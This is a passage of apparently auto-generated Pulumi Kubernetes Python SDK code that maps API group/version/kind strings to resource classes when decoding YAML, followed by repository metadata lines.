lambda x: (f"flowcontrol.apiserver.k8s.io/v1beta3/PriorityLevelConfigurationList:{x}",
PriorityLevelConfigurationList(f"{x}", opts, **obj)))]
if gvk == "meta/v1/Status":
# Import locally to avoid name collisions.
from pulumi_kubernetes.meta.v1 import Status
return [identifier.apply(
lambda x: (f"meta/v1/Status:{x}",
Status(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/Ingress":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import Ingress
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/Ingress:{x}",
Ingress(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/IngressClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import IngressClass
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/IngressClass:{x}",
IngressClass(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/IngressClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import IngressClassList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/IngressClassList:{x}",
IngressClassList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/IngressList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import IngressList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/IngressList:{x}",
IngressList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/NetworkPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import NetworkPolicy
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/NetworkPolicy:{x}",
NetworkPolicy(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1/NetworkPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1 import NetworkPolicyList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1/NetworkPolicyList:{x}",
NetworkPolicyList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1alpha1/ClusterCIDR":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1alpha1 import ClusterCIDR
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1alpha1/ClusterCIDR:{x}",
ClusterCIDR(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1alpha1/ClusterCIDRList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1alpha1 import ClusterCIDRList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1alpha1/ClusterCIDRList:{x}",
ClusterCIDRList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1alpha1/IPAddress":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1alpha1 import IPAddress
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1alpha1/IPAddress:{x}",
IPAddress(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1alpha1/IPAddressList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1alpha1 import IPAddressList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1alpha1/IPAddressList:{x}",
IPAddressList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1beta1/Ingress":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1beta1 import Ingress
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1beta1/Ingress:{x}",
Ingress(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1beta1/IngressClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1beta1 import IngressClass
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1beta1/IngressClass:{x}",
IngressClass(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1beta1/IngressClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1beta1 import IngressClassList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1beta1/IngressClassList:{x}",
IngressClassList(f"{x}", opts, **obj)))]
if gvk == "networking.k8s.io/v1beta1/IngressList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.networking.v1beta1 import IngressList
return [identifier.apply(
lambda x: (f"networking.k8s.io/v1beta1/IngressList:{x}",
IngressList(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1/RuntimeClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1 import RuntimeClass
return [identifier.apply(
lambda x: (f"node.k8s.io/v1/RuntimeClass:{x}",
RuntimeClass(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1/RuntimeClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1 import RuntimeClassList
return [identifier.apply(
lambda x: (f"node.k8s.io/v1/RuntimeClassList:{x}",
RuntimeClassList(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1alpha1/RuntimeClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1alpha1 import RuntimeClass
return [identifier.apply(
lambda x: (f"node.k8s.io/v1alpha1/RuntimeClass:{x}",
RuntimeClass(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1alpha1/RuntimeClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1alpha1 import RuntimeClassList
return [identifier.apply(
lambda x: (f"node.k8s.io/v1alpha1/RuntimeClassList:{x}",
RuntimeClassList(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1beta1/RuntimeClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1beta1 import RuntimeClass
return [identifier.apply(
lambda x: (f"node.k8s.io/v1beta1/RuntimeClass:{x}",
RuntimeClass(f"{x}", opts, **obj)))]
if gvk == "node.k8s.io/v1beta1/RuntimeClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.node.v1beta1 import RuntimeClassList
return [identifier.apply(
lambda x: (f"node.k8s.io/v1beta1/RuntimeClassList:{x}",
RuntimeClassList(f"{x}", opts, **obj)))]
if gvk == "policy/v1/PodDisruptionBudget":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1 import PodDisruptionBudget
return [identifier.apply(
lambda x: (f"policy/v1/PodDisruptionBudget:{x}",
PodDisruptionBudget(f"{x}", opts, **obj)))]
if gvk == "policy/v1/PodDisruptionBudgetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1 import PodDisruptionBudgetList
return [identifier.apply(
lambda x: (f"policy/v1/PodDisruptionBudgetList:{x}",
PodDisruptionBudgetList(f"{x}", opts, **obj)))]
if gvk == "policy/v1beta1/PodDisruptionBudget":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1beta1 import PodDisruptionBudget
return [identifier.apply(
lambda x: (f"policy/v1beta1/PodDisruptionBudget:{x}",
PodDisruptionBudget(f"{x}", opts, **obj)))]
if gvk == "policy/v1beta1/PodDisruptionBudgetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1beta1 import PodDisruptionBudgetList
return [identifier.apply(
lambda x: (f"policy/v1beta1/PodDisruptionBudgetList:{x}",
PodDisruptionBudgetList(f"{x}", opts, **obj)))]
if gvk == "policy/v1beta1/PodSecurityPolicy":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1beta1 import PodSecurityPolicy
return [identifier.apply(
lambda x: (f"policy/v1beta1/PodSecurityPolicy:{x}",
PodSecurityPolicy(f"{x}", opts, **obj)))]
if gvk == "policy/v1beta1/PodSecurityPolicyList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.policy.v1beta1 import PodSecurityPolicyList
return [identifier.apply(
lambda x: (f"policy/v1beta1/PodSecurityPolicyList:{x}",
PodSecurityPolicyList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/ClusterRole":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import ClusterRole
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/ClusterRole:{x}",
ClusterRole(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/ClusterRoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import ClusterRoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/ClusterRoleBinding:{x}",
ClusterRoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/ClusterRoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import ClusterRoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/ClusterRoleBindingList:{x}",
ClusterRoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/ClusterRoleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import ClusterRoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/ClusterRoleList:{x}",
ClusterRoleList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/Role":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import Role
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/Role:{x}",
Role(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/RoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import RoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/RoleBinding:{x}",
RoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/RoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import RoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/RoleBindingList:{x}",
RoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1/RoleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1 import RoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1/RoleList:{x}",
RoleList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/ClusterRole":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import ClusterRole
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/ClusterRole:{x}",
ClusterRole(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/ClusterRoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import ClusterRoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/ClusterRoleBinding:{x}",
ClusterRoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/ClusterRoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import ClusterRoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/ClusterRoleBindingList:{x}",
ClusterRoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/ClusterRoleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import ClusterRoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/ClusterRoleList:{x}",
ClusterRoleList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/Role":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import Role
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/Role:{x}",
Role(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/RoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import RoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/RoleBinding:{x}",
RoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/RoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import RoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/RoleBindingList:{x}",
RoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1alpha1/RoleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1alpha1 import RoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1alpha1/RoleList:{x}",
RoleList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/ClusterRole":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import ClusterRole
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/ClusterRole:{x}",
ClusterRole(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/ClusterRoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import ClusterRoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/ClusterRoleBinding:{x}",
ClusterRoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/ClusterRoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import ClusterRoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/ClusterRoleBindingList:{x}",
ClusterRoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/ClusterRoleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import ClusterRoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/ClusterRoleList:{x}",
ClusterRoleList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/Role":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import Role
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/Role:{x}",
Role(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/RoleBinding":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import RoleBinding
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/RoleBinding:{x}",
RoleBinding(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/RoleBindingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import RoleBindingList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/RoleBindingList:{x}",
RoleBindingList(f"{x}", opts, **obj)))]
if gvk == "rbac.authorization.k8s.io/v1beta1/RoleList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.rbac.v1beta1 import RoleList
return [identifier.apply(
lambda x: (f"rbac.authorization.k8s.io/v1beta1/RoleList:{x}",
RoleList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/PodScheduling":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import PodScheduling
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/PodScheduling:{x}",
PodScheduling(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/PodSchedulingList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import PodSchedulingList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/PodSchedulingList:{x}",
PodSchedulingList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClaim":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClaim
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClaim:{x}",
ResourceClaim(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClaimList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClaimList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClaimList:{x}",
ResourceClaimList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClaimTemplate":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClaimTemplate
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClaimTemplate:{x}",
ResourceClaimTemplate(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClaimTemplateList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClaimTemplateList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClaimTemplateList:{x}",
ResourceClaimTemplateList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClass
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClass:{x}",
ResourceClass(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha1/ResourceClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha1 import ResourceClassList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha1/ResourceClassList:{x}",
ResourceClassList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/PodSchedulingContext":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import PodSchedulingContext
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/PodSchedulingContext:{x}",
PodSchedulingContext(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/PodSchedulingContextList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import PodSchedulingContextList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/PodSchedulingContextList:{x}",
PodSchedulingContextList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClaim":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClaim
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClaim:{x}",
ResourceClaim(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClaimList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClaimList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClaimList:{x}",
ResourceClaimList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClaimTemplate":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClaimTemplate
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClaimTemplate:{x}",
ResourceClaimTemplate(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClaimTemplateList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClaimTemplateList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClaimTemplateList:{x}",
ResourceClaimTemplateList(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClass
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClass:{x}",
ResourceClass(f"{x}", opts, **obj)))]
if gvk == "resource.k8s.io/v1alpha2/ResourceClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.resource.v1alpha2 import ResourceClassList
return [identifier.apply(
lambda x: (f"resource.k8s.io/v1alpha2/ResourceClassList:{x}",
ResourceClassList(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1/PriorityClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1 import PriorityClass
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1/PriorityClass:{x}",
PriorityClass(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1/PriorityClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1 import PriorityClassList
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1/PriorityClassList:{x}",
PriorityClassList(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1alpha1/PriorityClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1alpha1 import PriorityClass
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1alpha1/PriorityClass:{x}",
PriorityClass(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1alpha1/PriorityClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1alpha1 import PriorityClassList
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1alpha1/PriorityClassList:{x}",
PriorityClassList(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1beta1/PriorityClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1beta1 import PriorityClass
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1beta1/PriorityClass:{x}",
PriorityClass(f"{x}", opts, **obj)))]
if gvk == "scheduling.k8s.io/v1beta1/PriorityClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.scheduling.v1beta1 import PriorityClassList
return [identifier.apply(
lambda x: (f"scheduling.k8s.io/v1beta1/PriorityClassList:{x}",
PriorityClassList(f"{x}", opts, **obj)))]
if gvk == "settings.k8s.io/v1alpha1/PodPreset":
# Import locally to avoid name collisions.
from pulumi_kubernetes.settings.v1alpha1 import PodPreset
return [identifier.apply(
lambda x: (f"settings.k8s.io/v1alpha1/PodPreset:{x}",
PodPreset(f"{x}", opts, **obj)))]
if gvk == "settings.k8s.io/v1alpha1/PodPresetList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.settings.v1alpha1 import PodPresetList
return [identifier.apply(
lambda x: (f"settings.k8s.io/v1alpha1/PodPresetList:{x}",
PodPresetList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSIDriver":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSIDriver
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSIDriver:{x}",
CSIDriver(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSIDriverList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSIDriverList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSIDriverList:{x}",
CSIDriverList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSINode":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSINode
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSINode:{x}",
CSINode(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSINodeList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSINodeList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSINodeList:{x}",
CSINodeList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSIStorageCapacity":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSIStorageCapacity
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSIStorageCapacity:{x}",
CSIStorageCapacity(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/CSIStorageCapacityList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import CSIStorageCapacityList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/CSIStorageCapacityList:{x}",
CSIStorageCapacityList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/StorageClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import StorageClass
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/StorageClass:{x}",
StorageClass(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/StorageClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import StorageClassList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/StorageClassList:{x}",
StorageClassList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/VolumeAttachment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import VolumeAttachment
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/VolumeAttachment:{x}",
VolumeAttachment(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1/VolumeAttachmentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1 import VolumeAttachmentList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1/VolumeAttachmentList:{x}",
VolumeAttachmentList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1alpha1/VolumeAttachment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1alpha1 import VolumeAttachment
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1alpha1/VolumeAttachment:{x}",
VolumeAttachment(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1alpha1/VolumeAttachmentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1alpha1 import VolumeAttachmentList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1alpha1/VolumeAttachmentList:{x}",
VolumeAttachmentList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSIDriver":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSIDriver
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSIDriver:{x}",
CSIDriver(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSIDriverList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSIDriverList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSIDriverList:{x}",
CSIDriverList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSINode":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSINode
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSINode:{x}",
CSINode(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSINodeList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSINodeList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSINodeList:{x}",
CSINodeList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSIStorageCapacity":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSIStorageCapacity
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSIStorageCapacity:{x}",
CSIStorageCapacity(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/CSIStorageCapacityList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import CSIStorageCapacityList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/CSIStorageCapacityList:{x}",
CSIStorageCapacityList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/StorageClass":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import StorageClass
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/StorageClass:{x}",
StorageClass(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/StorageClassList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import StorageClassList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/StorageClassList:{x}",
StorageClassList(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/VolumeAttachment":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import VolumeAttachment
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/VolumeAttachment:{x}",
VolumeAttachment(f"{x}", opts, **obj)))]
if gvk == "storage.k8s.io/v1beta1/VolumeAttachmentList":
# Import locally to avoid name collisions.
from pulumi_kubernetes.storage.v1beta1 import VolumeAttachmentList
return [identifier.apply(
lambda x: (f"storage.k8s.io/v1beta1/VolumeAttachmentList:{x}",
VolumeAttachmentList(f"{x}", opts, **obj)))]
if gvk == "apiextensions.k8s.io/v1/CustomResourceDefinition":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiextensions.v1 import CustomResourceDefinition
obj.pop("status", None) # Delete output-only status field to avoid errors.
return [identifier.apply(
lambda x: (f"apiextensions.k8s.io/v1/CustomResourceDefinition:{x}",
CustomResourceDefinition(f"{x}", opts, **obj)))]
if gvk == "apiextensions.k8s.io/v1beta1/CustomResourceDefinition":
# Import locally to avoid name collisions.
from pulumi_kubernetes.apiextensions.v1beta1 import CustomResourceDefinition
obj.pop("status", None) # Delete output-only status field to avoid errors.
return [identifier.apply(
lambda x: (f"apiextensions.k8s.io/v1beta1/CustomResourceDefinition:{x}",
CustomResourceDefinition(f"{x}", opts, **obj)))]
return [identifier.apply(
lambda x: (f"{gvk}:{x}",
CustomResource(f"{x}", api_version, kind, spec, metadata, opts)))]
def invoke_yaml_decode(text, invoke_opts):
inv = pulumi.runtime.invoke('kubernetes:yaml:decode', {'text': text}, invoke_opts)
return inv.value['result'] if inv is not None and inv.value is not None else []
|
2d5dd2b22b2834ad316de918ea28587714530c1e
|
db58d00b8be8978b81a567ca5800ec0b40b11d6f
|
/Modulos/cfirm.py
|
e5a1307319cf2f807f6042d57a0f8ef329aff915
|
[
"MIT"
] |
permissive
|
AAAAAEXQOSyIpN2JZ0ehUQ/SSHPLUS-MANAGER-FREE
|
